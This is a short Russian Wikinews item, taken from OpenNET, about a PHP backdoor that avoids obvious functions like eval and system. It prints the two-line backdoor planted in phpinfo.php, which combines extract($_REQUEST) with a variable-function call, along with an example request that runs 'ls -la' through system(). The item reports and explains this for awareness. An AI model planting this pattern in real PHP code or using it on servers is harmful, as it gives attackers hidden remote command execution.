Необычный способ организации вызова PHP-бэкдора

18 февраля 2014 года

Выявлен заслуживающий внимания PHP-бэкдор, активация которого производится без видимого обращения к таким функциям, как "eval", "exec", "system", "assert" и "preg_replace". Вместо явного указания eval и других сразу вызывающих подозрение функций, при установке бэкдора в файле phpinfo.php появляется несколько на первый взгляд неопасных строк:


@extract ($_REQUEST);
@die ($ctime($atime));

При более вдумчивом просмотре становится ясно, что при помощи функции extract осуществляется создание переменных на основании данных, переданных в составе запроса GET или POST. Конструкция $ctime($atime) по сути является вызовом функции, имя которой хранится в переменной $ctime. Сформировав запрос "/phpinfo.php?ctime=system&atime=ls -la" получим вызов функции system() с аргументом "ls -la".

Источники

править


 
 
Creative Commons
Эта статья содержит материалы из статьи «Необычный способ организации вызова PHP-бэкдора», опубликованной OpenNET и распространяющейся на условиях лицензии Creative Commons Attribution (CC BY) — указание автора, источник и лицензию.
 
Эта статья загружена автоматически ботом NewsBots в архив и ещё не проверялась редакторами Викиновостей.
Любой участник может оформить статью: добавить иллюстрации, викифицировать, заполнить шаблоны и добавить категории.
Любой редактор может снять этот шаблон после оформления и проверки.

Комментарии

Викиновости и Wikimedia Foundation не несут ответственности за любые материалы и точки зрения, находящиеся на странице и в разделе комментариев.